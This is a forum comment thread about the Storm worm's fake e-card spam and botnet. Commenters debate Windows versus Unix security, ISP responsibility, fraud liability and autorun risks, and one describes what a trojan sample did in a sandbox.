This is a variation on what I call the Washing Machine Analogy. I originally invented it because I got tired of having to reboot my machine to "fix" certain problems. My response was that if I bought a washing machine that I had to unplug and then plug back in to get it to work, I'd take the damn thing back to the store and buy another brand.

Re:Idiot-proofing the ultimate tool

[MrMr]

On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".

Re:Idiot-proofing the ultimate tool

[Kjella]

You talk as if this is an unsolved problem. There's a range of solutions that could be used from using two-factor authentication, a non-networked computer, a "no-play" locked down computer where you don't block everything in firewall and don't install anything funny or even surf around, a webTV like device sold by online banks or any other number of variations. People don't want it, they want to do everything on their general purpose machine, which tells me it doesn't happen often enough or doesn't hurt enough.

It's as if your boss told you there's only going to be one server which will be your internal test, production and public webserver. There's really one solution - don't do it that way (or you can maybe hack up something with a VMware server but I still wouldn't touch that with a ten foot pole). Trying to make something people install various bits and pieces of code from all over the place on secure, is trying to make water not wet.

It doesn't work on us not because of sudo but because we got this alarm, not anywhere in the computer but up in our heads, that says "okaaaaaaaay running/allowing this is probably not a good idea". Most people don't have and will never have that alarm. The only thing that'll protect them is to limit their compromise. Then you have to deal with the spam bot in some other way. For one, ISPs coming down hard on boxes sending it out would be a good start...

Re:Idiot-proofing the ultimate tool

[prshaw]

This isn't really a problem of the washing machine not working, it is more an untrained user washing their white clothes with the red clothes and then complaining that they didn't come out white but are now pink. Yes you could take the washer back, but it isn't the washer or manufacture's fault.

Re:Idiot-proofing the ultimate tool

[justinlee37]

can compromise your entire life, and ruin your future.

I'm skeptical.

Re:Idiot-proofing the ultimate tool

[ralphdaugherty]

can compromise your entire life, and ruin your future.

I'm skeptical.

      You can be skeptical for those that enter no personal data such as passwords, account numbers, and credit card info online, but for everyone else their future is ruined when their accounts are drained and even their identity stolen because a trojan forwarded their keystrokes to a Commie, excuse me, enterprising capitalist thriving in a socialist country.

  rd

Re:Idiot-proofing the ultimate tool

[justinlee37]

Most (or possibly all) banks insure your deposits against that sort of fraud; it would be a huge hassle, sure, but to say that it would be life-ending is just sensationalist.

Re:Idiot-proofing the ultimate tool

[ralphdaugherty]

Most (or possibly all) banks insure your deposits against that sort of fraud; it would be a huge hassle, sure, but to say that it would be life-ending is just sensationalist.

      They'll replace thousands of dollars transferred from your account? There was a big writeup on this recently about how the funds were used to buy stuff and sent to a network of unsuspecting accomplices who were duped into shipping the contraband overseas.

      At no point in the article did anyone say, oh, so what, my bank insures me against this kind of fraud. Why even bother writing an article on it?

      Nope, they were pretty distraught for having all their losses insured. And with credit card, I thought there was a limit of $50 refunded for fraud?

      But there were others whose identity was stolen, and their life was ruined. They said so.

  rd

Re:Idiot-proofing the ultimate tool

[thogard]

Many of the safety features you mention are there because of UL. UL is a lab set up by insurance companies to encourage safer products to save the insurance company money.

I wonder what will happen if a bunch of insurance companies all got hit with suites going after home owner liability insurance payoffs. Would the insurance companies then got after MS or would they just force all insured home owners to run the latest version of their favorite corps bad anti-virus code?

Re:Idiot-proofing the ultimate tool

Have you tried this? Most modern clothes have dies that won't bleed and most clothes no longer need to be separated before they are washed. I tend to wash new clothes by themselves with normal detergent and a tablespoon of bleach and if there is any color change, they go back to the store but I haven't returned anything in over a decade.

Re:Idiot-proofing the ultimate tool

[mangastudent]

Actually, I occasionally have to power cycle my new GE washer, mostly I sometimes "outsmart" it's microprocessor. Also, hitting stop doesn't really stop it, so to soak clothes I have to pull the plug.

It's otherwise such a fine device I'm extremely happy to put up with the above (like my mom, I'm a "laundry Nazi" ^_^ so I demand a lot more out of one than anyone else I've ever known).

But more to the point, after AC was broadly available, how long did it take for an electric washing machine to even be invented? And how safe was it (not very, I'll bet).

I think we need a sense of history here: imperfect institutions run by imperfect people will not immediately use a new thing like electricity or general purpose computers properly. People will get killed or otherwise harmed when there was no theoretical need for that. Give this new thing a little more time (measured in decades) and I'll bet things will get much better.

Anyone want to bet on Microsoft keeping their monopoly of desktop garbage for 30 more years?

Re:Idiot-proofing the ultimate tool

[the+eric+conspiracy]

I thought there was a limit of $50 refunded for fraud?

Other way around. The max limit of personal liability for credit card fraud is $50. All major credit cards today have a 0 limit.

Bank fraud limits are more dicey - your liability is capped at $500 IF you report it within 60 days. After that it may be tougher to recover the loss. Debit cards are not covered the same way as credit cards.

Most identity thieves work by opening new credit in your name and using up the credit. They can get much more money that way than by draining a checking account of a few thousand dollars.

If you live in a state with identity theft protection laws you can put a freeze on your credit information. This is very effective in stopping the major modes of identity theft.

Re:Idiot-proofing the ultimate tool

[ralphdaugherty]

      very useful info. thanks.

  rd

stupid motherfuckers

I'd like to strangle every one of them- the botnet herders, the assholes buying their services, the piss-poor vendors who sell insecure systems, and the sheeple who run unpatched Windows. I'm on OS X, fully-patched, and still get this crap every day. What a
waste of the world's resources.

You have an greeting card from an mate (click!)

[voidy]

I must say, it's good to know where all that was coming from. I rarely get spam, as I use a mailserver with greylisting, and any spam I do get is generally filtered correctly using Amavis/Spamassassin and ClamAV. This greeting card stuff though has plagued me. It's been marked as spam alright, but it looks like the botnets are starting to use proper SMTP servers to relay now, rather than just one shot attempts to directly connect to mailservers on port 25. A lot of outgoing traffic on port 25 is blocked from most ADSL networks nowadays, so it's more common to have to relay through your ISP's, or another relay server. This is going to make greylisting redundant pretty soon, as it works purely on the basis that any client connection which fails first time, will try again later as per the RFC's. If the Bots are relaying through RFC compliant servers, then there really isn't any point in the greylisting anymore. It's just a technology that provides a little temporary relief from the problem. Nice to know why the greeting card stuff started and stopped so abrubtly regardless.

~boooodc/bin.php in apache log files

Has anyone been seeing get requests for ~boooodc/bin.php in their log files? This has been happening to me for a month. Some are even trying to use my host as a proxy to get this from other IPs. A google search has only shown 5 entries and they look to be publically accessible log files.

Weak, as I expected vs. my challenge... apk

LOL... is that the best you have as a comeback? Weak, (as per usual) from /. posters, especially regarding this type of topic, backing up their statements that "Windows is less secure or securable than *NIX & its variants")...

Lots of talk, yet no action! I say this based on a history of evidences I noted in my last post, point-blank. Argue with the numbers.

No photo proof of a score from a *NIX rig, vs. what I produce as a challenge to those that say "Windows is less secure than (insert *NIX variant here)" as to a result on a valid multiplatform security benchmark...

Put your monies where you mouths are boys!

Just beat the 85.185/100 score I can obtain using Windows Server 2003 SP #2 fully patched & custom security hardened, with the *NIX of YOUR choice... & put up photo proof (unedited, because one fool said he could do that, how WEAK!)...

Simple.

APK

P.S.=> BOTTOM-LINE: Talk's cheap boys... especially "F.U.D."-based b.s. like:

"(Insert *NIX variant here) is more secure or securable than Windows!"

That I see here @ /., worse than any other website online in fact. I don't mind it if it has some basis in verifiable facts with examples, but I do when that statement or one like it, has none of the aforementioned requirements.

So - "Put up, or shut up"... prove it. Put your monies where your mouths are... & with YOUR OWN SYSTEM, not someone else's tests or info. (the BEST test, not only of your big talk, but of YOUR SKILLS IN PERSONALLY KNOWING HOW TO HARDEN YOUR *NIX RIGS, vs. mine on Windows Server 2003).

Download, & install CIS TOOL (@ the center for internet security's website, link is in the URL below):

CIS TOOL DOWNLOAD PAGE @ THE CENTER FOR INTERNET SECURITY:

http://www.cisecurity.org/index.html

(... run it, & beat that score I get on a Windows NT-based OS of 85.185/100 currently, & on a legitimate multiplatform test of security (noted by COMPUTERWORLD & SANS, 2 sites often cited here @ /., no less, in security-oriented threads no less) called CIS TOOL))... apk

Re:Weak, as I expected vs. my challenge... apk

[jguthrie]

The Debian Linux "test" is a PDF file describing how to secure my system, I downloaded it, but couldn't figure out how to compute my score.

Re:Weak, as I expected vs. my challenge... apk

Is Debian Linux one of the builds of Linux this program works for? If so, it has a reports results page, & it tells you WHERE to click on its interface when the test's done running (takes around 1 minutes tops to complete) it LITERALLY tells you to "click on reports"...

Some "FYI": The ones that only have PDF models apparently do NOT (for some odd reason) mesh with other *NIX variants from their family code basetrees, oddly...

It's STRANGE imo that other versions of Linux or BSD builds DO run it!

(Especially odd some do not, since they are from the same codetrees, & this test's java driven... perhaps they store things differently than their brethren, as far as files that keep state & are for security such as password file locations, under the /etc tree-subtrees on disk).

After all - It SHOULD work for any/all Linux's, imo @ least, OR it should (it's JAVA driven)... odd if it doesn't!

Windows usually doesn't have a problem there, in shell mode/userland, & it's one of its strengths in fact, & the use of JAVA as the runtime interpreter should also see to it on LINUX!

Above all - Win32 wares generally work across ALL Windows NT-based code, barring drivers level code & apps that directly "touch" hardware (as they did in DOS)...

Now, unlike DOS/Win3.x, hardware is accessed thru the OS HAL & drivers + subsystems managed layers of the OS (Object Mgr. (security layer), Configuration Mgr. (registry), & Memory mgr. + Cache mgr. (self-explanatory as to their purpose) etc.)

That layering & method of control still exists in current modern builds of Windows since Windows NT 3.1, even though changes occurred in locations of subsystems from usermode to kernel mode, & back again @ times even!

(E.G.-> Video in NT 3.1 - 3.51 : First, it was usermode code there, then it was moved to kernelmode (Windows NT 4.0/2000/XP/Server 2003) & back to usermode (VISTA)).

Windows NT-based OS versions run it, just fine, because they are ALL from the same family "basecode tree" & kernel (for the most part @ the UserMode/Ring 3/RPL 3 level of operation priveleges even, for the most part & totally @ the kernel level (because L.T. makes sure of this much @ least, by controlling kernel development)).

Now, there are other exceptions, from the BSD family code tree: FreeBSD runs this test, OpenBSD does not, & neither does MacOS X... which again, IS ODD, considering they are ALL/EACH BSD derivants & this test's code is java driven.

APK

Re:Weak, as I expected vs. my challenge... apk

[frycarson]

Your style of writing makes my eyes bleed.

Re:Weak, as I expected vs. my challenge... apk

Your style of writing makes my eyes bleed." - by frycarson (704980) on Sunday August 26, @10:25PM (#20367427) Yes, per my subject line above? The WEAKEST RESPONSE OF ALL... the inevitable attempted "spelling & grammar checker"... lol!

(Apparently, for all the "(Insert *NIX variant here) is more secure/securable than Windows" b.s. I see here @ /., not a SINGLE *NIX USER CAN SURPASS MY SCORE OF 85.185 on the multiplatform benchmark gauge of security CIS TOOL (noted by both SANS & COMPUTERWORLD, 2 sites often cited here regarding security no less, & thus, respected))

Too easy!

APK

P.S.=> Predictable... apk

Re:I had a 500% increase in Spam on Tuesday Last W

[Reaperducer]

This Slashdot entry, itself, appears to be spam. Neither link provides any information that anyone who's gotten one of these mails didn't already know.

Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.

All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? They're spam!"

Maybe it's well-intentioned, but as far as I can tell this is just more BlogSpam pretending to be a Slashdot entry. It's getting like freakin' Digg around here these days.

Is there a point to this torture anymore?

[Dachannien]

After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

Re:Is there a point to this torture anymore?

[CaptainTylor]

To paraphrase P.T. Barnum, there's a Windows user born every minute.

Does Storm Only Attack Windows?

[Nom+du+Keyboard]

Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?

Re:Ha! ISPs?

[WhatAmIDoingHere]

How, exactly, could ISPs block all the spam? And if they did, what if they block something important? False positives are still an issue. I'm pretty sure the first ISP to figure out how to do that would advertise it and would get TONS of people switching to them.

Easy to prevent this problem in Outlook

I have my Outlook set to show all messages in text (instead of HTML or richtext), and the 'reading pane' option is turned off so that I actually have to click on the email header to open the message. Most of the time I can recognize the spam just by the message title, and I delete it without reading or opening the email. By setting everything to text, it makes any imbedded web links unclickable, but I guess I'm preaching to the choir here. You people know this stuff. It's the noobies that need the advice.

I also refuse to click on any links sent to me by friends. 'WOW COOL VIDEO MUST WATCH THIS ONE!' I get phone calls later on, asking if I thought the video clip was funny. I have to tell them I don't know, since I deleted the message. Since I make my living with this computer, I can't afford to do something stupid and mess it up by downloading someone else's junk, spam, virus or botnet.

Does it read slashdot?

[bobintetley]

Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...

Disconnect them

[LordSnooty]

Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.

Re:Disconnect them

[prshaw]

Not that I totally disagree with the idea, but do we really want ISP's to start disconnecting computers because someone doesn't like what the computer is sending out?

I don't like what you are saying, or those nasty Linux programs you distribute, so I go to your ISP and say disconnect them they are spreading nasty programs.

It's only a small step from saying disconnect someone infected with the Storm Worm and saying diconnect someone infected with Linux.

I get tens of thousands of Storm emails a day, so I am open to a solution. But I don't want the solution being someone says what we can or cannot have on our computers without some very careful thought given to how it could be used.

You want to say disconnect the botnet, but can someone claim that any p2p or sharing system is a botnet? It is a lot like pron, if I don't like it then it is bad. Trouble is not everyone has the same idea of what they don't like.

Re:Disconnect them

[zaren]

"It's only a small step from saying disconnect someone infected with the Storm Worm and saying diconnect someone infected with Linux."

What? It's nowhere near a small step. It's a huge step to go from "let's get infected, unsecured spam factories off the Internet" to "let's destroy peer to peer". Spam botnets have nothing in common with P2P networks. Spamming is illegal under Federal law, P2P is not.

And "infected with Linux"?!? You sound like a Microsoft shill. Nobody gets "infected" with Linux, they install it of their own free will - unlike Storm, or Sasser, or any of thousands of other viruses, trojans, and hacks that can get installed on your machine without your permission simply because you happen to run Windows.

Re:Disconnect them

[houstonbofh]

I do. We run the WiFi for several hotels. The storm worm traffic is easy to spot. We block them. They call support. A PFY says, "Oh, your 'DELL53476' and you have the storm worm." Then we tell them the closest Fry's or Best Buy. It ain't much, but I stopped 6!

There are many solutions...

[Joce640k]

"...with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem."

There are plenty of solutions. A new authenticated email protocol could be devised, a switchover date set (e.g. December 31st, 2007), and the world would be largely free of spam overnight. It would take far less effort then was expended for the Y2K problem.

Anybody who didn't update their server would have their mail sent through as before but with the word "[SMTP]" inserted into the subject line for easy filtering.

The only real obstacle is that it would require the active, unbiased participation of a certain large. So far they haven't shown any will to participate in the meetings.

Re:Ha! ISPs?

[ispsuckx]

Funny sig ! ISPs do very little to protect users. Take for example AOHELL. Just because someone offers a better service doesnt mean they will get more users. ISPs could notify users there boxes are sending spam. Its trivial to tell if someone is sending spam, there are numerous blockers/scanners which could detect the spam being sent, and then the isp could notify the customer. Will they do this...... no, because they don't care / make money from it. False positives may be an issue, but the entire process does not need to be automated. I'm sure they couldn't kill all the spam, they could however behead some botnet zombies, by being more proactive/informing customers. ISPs do very little to curb this stuff, it is obvious that the could do more, considering they are acting as the gateway to the rest of the internet, they don't have to / can prevent proliferation of these actions. Here is a list some ideas: http://www.thepcspy.com/articles/security/shouldnt _isps_protect_their_users

New Global Holiday

[The+Living+Fractal]

Let's call it "Tabula Rasa" day, or since that name is the name of an upcoming game, let's just call it "Global Reformat Day". Everyone in the world reformats their computer on that day.

Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.

Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.

Re:New Global Holiday

[Andypoo]

And you're going to globally do an update after they all reformat?

So, wait, EVERYBODY is going to try to do Windows Update on the *same* day?

And whilst it's downloading? In normal circumstances, this already takes a long time. Reinstalling somebody with pre-SP2 XP for example isn't exactly the smartest move now, is it?

This is a really silly idea if you *did* get everybody onboard.

Andy.

Re:New Global Holiday

[DamnStupidElf]

Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.

The obvious solution is to just direct the botnets to recognize the first Reformat Day automatically.

Re:New Global Holiday

[thogard]

Consumer protection laws in most countries require Microsoft to recall their software due to damage its done to innocent 3rd parties yet where in the world did that happen? How about free (or $2) CDs at the local computer shop that will reinstall and patch whatever disks people are likely to have.

Remember grandma with the hacked computer is running software that is owned by Microsoft. She only licensed it and the owner is still to blame.

You're just another WEAK F.U.D. spreading troll

LOL, predictable:
----

"Go shill somewhere else troll" - by ispsuckx (1147895) on Sunday August 26, @05:12PM (#20365173) ----

Troll?

Hey, look - I am only responding to folks here that are *NIX people, spreading more of their usual F.U.D. b.s. here @ /., which is usually along the lines of:

"(Insert *NIX variant here) is more secure/securable than Windows"

That is all...

(& I am just giving them a COMPLETELY FAIR CHANCE, to back up their b.s., & prove me wrong IF they can, & they must exceed an 85.185/100 score on the CIS TOOL to do so, & post a valid unfaked photo of their score on this *NIX rig of their OS choice!)

That's all, simple... but, apparently, NOT so simple, eh, to live up to words I am only responding to, asking folks to back up their words, & put their monies where their mouths are, that run *NIX & that say things more or less along the lines of what I bolded above...

APK

P.S.=> Now, the funniest part is? Your subject line's "Ha"!

Well... I get that "last laugh", as per usual, when it comes to THIS challenge I issue here every time I see more of this b.s. -> "(Insert *NIX variant here) is more secure/securable than Windows" crap... you're just another one, RUNNING! "Run, Forrest... RUN!!!", lol!

AND, "Newsflash" - No OS ships as 'secure as it can REALLY be' out of the box/stock oem builds usually...

You're just another b.s. artist left with NOTHING but more b.s., but no score on your *NIX rig, vs. mine on Windows Server 2003 SP #2 fully patched & custom hardened for security, that exceeds my score of (currently) 85.185/100 on CIS TOOL...

CIS TOOL DOWNLOAD:

http://www.cisecurity.org/index.html

CIS TOOL is a valid legitimate test of security noted in SANS & COMPUTERWORLD (often cited here @ /. in posts regarding security & thus, respected ones) as a tool for helping to secure multiple OS platforms & apparently? After my challenging those here @ this website 30++ times now??

Folks here on their *NIX rigs just aren't all that good @ securing their machines it seems, for all of their "bluster"... so, put your monies where your mouths are, put up OR shut up, & beat my score...

Until you do? You look INCREDIBLY STUPID & FOOLISH... talk's cheap, show us how secure your *NIX rigs, really are, & beat my score... apk

Re:I had a 500% increase in Spam on Tuesday Last W

[wagonlips]

Considering that the post contains a link to a page that has a link to the trojan, I think we can all expect the trojan to be even more prevelant by Monday. Not sure who to be more upset with at this point: the people that wrote it, John Pospisil for posting a live link to the infected page (seriously, remove the href already), or kdawson for linking to Pospisil.

Re:I had a 500% increase in Spam on Tuesday Last W

[LilGuy]

It may behoove you to invest in some services from Postini rather than spend money on more infrastructure. They handle such massive spam mail volumes with relative ease and their customer support is top-notch when a rare spam happens to slip through.

Pwn The Botnet?

Surely the massive multi billion dollar business/military behemoths can utilize some of their 'crackers' to comandeer this botnet (since after all by it being a botnet means it's inheritently insecure) and squirt their own disenfectant worm through the network?
Or of course they could leave a potential terrorist tool that is so large it could disable specific parts of 'teh internet' if so required?

Re:Pwn The Botnet?

[petermgreen]

what would you say makes a botnet inherently insecure? The bot can patch the exploits it used to get in and can be made to only take and relay commands if they are cryptographically signed by the bonets owner. That way taking over one machine from the botnet doesn't really get you any further towards compromising the net as a whole.

gets sued for, say, USD 100,000,000,000

[Joseph_Daniel_Zukige]

I say it's only a matter of time. The evidence of malfeasance is there.

Well, that's naming the problem.

[Joseph_Daniel_Zukige]

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be earning billions a year fighting this crap. Hope your happy Billyboy Gates!

There, fixed that for ya

Re:I had a 500% increase in Spam on Tuesday Last W

[geekboy642]

Are you nuts? Nobody on Slashdot RTFAs.

logged in on a different account

[Joseph_Daniel_Zukige]

and modded yourself informative, I suppose?

Re:logged in on a different account

[BenoitRen]

Is that the best counter-argument you have? How sad.

Argggg yourself and see how you like it.

[Joseph_Daniel_Zukige]

First --

hypothesis contrary to fact:

"If Microsoft were not the dominant OS ...."

Start with a false premise and your conclusions are based on a false premise.

Before that, however --

Microsoft is the company that has consistently insisted on adding unsafe features just because they figure the industry gives them a couple of years buffer before the stuff hits the fan.

Fighting logical fallacy with logical fallacy, I'll offer this analogy. If Microsoft were the football team that has been winning the national championships for twenty years and the world championships for ten, yeah they'd have enemies and be the subject of envy and idolism. If everyone were cheating, a lot of the idols would excuse them because everyone cheats.

But what we have here is Microsoft's insisting on using exploding footballs, and more and more of the spectators are realizing they are the ones that get hurt every time Microsoft kicks the ball into the stands.

More of the hair of the dog

[Joseph_Daniel_Zukige]

that bit ya, huh?

Gentoo FTW!

[ncc74656]

Actually some Linux Distro's do have open ports. One of the first things I do when I install a distro at work is run nmap to get a list, and then start closing them ports I don't want open. Usually those are Redhat / RPM based distros.

I set up an Ubuntu VPS recently because the service provider didn't offer Gentoo. In addition to sshd, the VPS already had Apache and Sendmail installed and running. There were some ports associated with VPS management that were open. I think Samba may have even been installed and running (but I got rid of that). Now that I've done another port scan again, it looks like something is still running on TCP port 53...probably BIND.

With Gentoo, OTOH, an out-of-the-box install doesn't have anything open. OpenSSH is installed, but you have to enable it yourself. Nothing else is installed, so you don't have to worry about holes in Sendmail or BIND getting your new box pwned before you have a chance to replace them with qmail and djbdns. For that matter, if you don't need a mail server (or any other kind of server) at all, you can just not install one.

Re:Gentoo FTW!

The key is the Ubuntu VPS was not an "out-of-the-box" installation. It was customized to be a remotely administered webserver - just as had been requested from the hosting company.

Do your own Ubuntu install and see that I'm correct.

Re:Gentoo FTW!

[mcpkaaos]

With Gentoo, OTOH, an out-of-the-box install doesn't have anything.

There, fixed it for you.

Re:I had a 500% increase in Spam on Tuesday Last W

[houstonbofh]

On the contrary. This is another article for me to print for the PHB, telling him why I have had some much time over the last month.

It is also a peer bonding thing, like "It burns when I pee." "Hey, it burns when I pee as well!"

Re:If only they could use the botnet for the good.

[houstonbofh]

Because it was already cracked. By one guy. After cracking HD-DVD. Like 6 months ago... They should try something hard. Like understanding women!

Show of Hands

All of you still stupid enough to use Microsoft products raise your hands!

Autorun and Autoplay

[Keybounce]

> 2a. Windows is still vulnerable to autorun attacks in CDs and USB keys.

As any Amiga user that ran into the Disk-Validator virus will tell you, autorun and autoplay are nightmares waiting to happen.

Disk-Validator was what, 1986? 20 years ago that the idea of "If a specially marked disk is inserted, run a program without any user confirmation" was demonstrated to be a disaster, a way for malicious programs to clobber computers.

I know of no way to disable autorun and autoplay on Windows systems without disabling AutoInsertNotification (notify the system if a disk is changed), yet that one is wanted.

And yes, auto-play is a problem. My friend has a windows XP system that tries to run the Photo Gallery installer anytime a disk is inserted with pictures or videos, and I don't know how to disable it. It seems to be triggered by autoplay. And if this can trigger program X, then it can be rigged to trigger program Y.

Re:Autorun and Autoplay

[klui]

It's interesting. I recently installed VMWare Player 2.0.0 Build 45731 and my Windows 2003 installation now have autoinsertion on but autoplay off. The disc information and custom icon are refreshed automatically within Windows Explorer.

Prior to using 2.0, 1.x totally disabled autoinsertion and autoplay (the normal behavior). I ran a Microsoft utility (Autoplay Repair Wizard) that verifies the sanity of autoplay registry and it re-enabled autoinsertion and autoplay (some inconsistencies were corrected [HKLM\...\Services\cdrom\Parameters!Autorun = 0x01]). That was the state of my autoinsertion/autoplay when I installed VMWare Player 2.0. Perhaps it is a combination of running the wizard and VMWare Player?

HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer!NoDriveTypeAutoRun = 0x91
HKLM\Software\Microsoft\WIndows\CurrentVersion\Pol icies\Explorer!NoDriveTypeAutoRun = 0xff

Tried to reproduce this on my notebook running XP SP2 but it didn't work. Custom icon doesn't change nor is the disc information updated. But if I were to open a window in front of Explorer or I drag it outside the current window and drag it back, the disc information is updated--but not the icon. This behavior existed before I upgraded VMWare Player. VMWare Player 2.0 apparently creates HKLM\...\Policies\Explorer!NoDriveTypeAutoRun = 0xff.

How does this thing work?

[Terrasque]

I tried taking a closer look at this bot thing, but couldn't find out how it worked.

I set up a test system with a vmware'd winxp, running process monitor on the xp and wireshark on the host, wireshark only showing packets to and from the vmware xp's ip address.

So I snapshot'ed it, ran the exe from the links, and .. nothing happened. It did some write to a few files,

C:\WINDOWS\spooldr.exe
C:\WINDOWS\system32\spooldr.sys
C:\WINDOWS\system32\drivers\tcpip.sys

which looks scary enough. But apart from that, nothing seem to have happened. Nothing in wireshark, and nothing on the machine.
I rebooted the vmware xp and let it stand for a few hours. Still nothing at all. Only traffic in wireshark was smb announces, and nothing happened at the vmware. So, if this is a bot and/or a spam sender. How does it communicate? How does it send spam? How does it work?

Re:How does this thing work?

Most of new viruses/malware don't work under virtualization. They detect VMWare, traffic analysis tools and debuggers in order to prevent analysis of their behaviour.

Re:If only they could use the botnet for the good.

[Jafafa+Hots]

I meant cracking the thing so that any new keys will be useless. From what I understand, the last "crack" wasn't really a crak more like a workaround that could be disabled by the issuance of new keys.

Re:I had a 500% increase in Spam on Tuesday Last W

[garwain]

yeah, I noticed a huge spike lastweek, over 300% spam increase (up from one message received to 4). Makes me want to check my mail server logs to see what I haven't received...

B.S.

[encoderer]

"Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do"

Ok, I call Bullshit.

1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average /.'er for the UAC prompts. However, the user is only shown a prompt when an application is doing things that people in this thread are saying applications should not be allowed to do. No, UAC is not an elegant solution. But the problem is that an entire ecosystem of software exists that was not written with an eye on security. These apps are doing things that apps should not be doing, often time just to make things easier on the programmer.. Microsoft needs to throw a UAC when this happens. In time, more and more apps will play by the rules and not throw prompts.

This is a tangent, but still to the point: MSFT is dammed if they do, dammed if they don't.

2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.

3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.

Your approach is a LOT like saying "Terrorism won't be a problem once everyone switches to Christianity."

Re:B.S.

[cp.tar]

1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average /.'er for the UAC prompts. However, the user is only shown a prompt when an application is doing things that people in this thread are saying applications should not be allowed to do. No, UAC is not an elegant solution. But the problem is that an entire ecosystem of software exists that was not written with an eye on security. These apps are doing things that apps should not be doing, often time just to make things easier on the programmer.. Microsoft needs to throw a UAC when this happens. In time, more and more apps will play by the rules and not throw prompts.

This is a tangent, but still to the point: MSFT is dammed if they do, dammed if they don't.

I haven't used Vista, and probably will not for quite a while.

However, security through annoyance, which is what UAC is by all accounts, is no security at all.

The only way of making Windows secure is, basically, breaking compatibility and starting all over again. Somebody here has a signature saying, I quote from memory: "OS X: because it was easier to make Unix user-friendly than to fix Windows". Which may sound like flamebait, but you yourself admitted the whole ecosystem of software not written with an eye on security. Even more so, I'd add: much of the software relies on certain "features" of Windows which allow such dreadful security.

2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.

I'm sorry, were you telling me something about

"Terrorism won't be a problem once everyone switches to Christianity."

By FSM, praised be His Noodly Appendage, you were. Pot, meet kettle. Kettle, pot.

First, we have yet to see the reward factor of Windows diminishing. And I'm sorry, but I'm skeptical: Windows is defective by design. It is designed to keep compatibility with fundamentally insecure software. It is designed without a way to be really certain the software you're installing is secure. It is designed with a certain userbase in mind, and said userbase is used to working with such insecure software. And to top it all off, it's the most widespread OS - not really going away any time soon, and from what I see, not really improving its security either.

3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.

Well, I did allow for MS to build a fundamentally more secure OS, but it isn't happening.

UAC would be a fairly usable and tolerable thing if Windows users were generally educated, or at least English-speaking. However, since I've experienced non-English-speaking people disabling firewalls and anti-virus programs because the messages they couldn't understand annoyed them, I can tell that more prompts only produce more annoyance to non-expert users. And to expert users as well, for the most time. And you do not want to be annoye

Re:B.S.

[encoderer]

1. I wasn't bashing Linux or OSX or anything else for being insecure. Well, I suppose you could say I was, but if you do, you'd have to acknowledge that I was bashing them all equally. And I certainly gave them credit for being more secure than Windows (the fence analogy, 9 feet vs 6 feet). As desperately as you want me to be, I'm not a windows fanboy or a microsoft apologist. If I were you could dismiss me. I'm a realist. Just that simple.

2. If you think that UAC is "security by annoyance" than you are not seeing the big picture! As more and more people buy new computers with Vista (which is a predetermined reality. A truly bad OS could hurt MSFT, but not in one product cycle.), anyway, as people buy these computers, and load up their software, you're going to see--I believe--darwin-like natural selection occur. You're going to see Vista-friendly apps "selected" in the wild, making them more popular, which makes them more selected, and a positive feedback loop occurs.

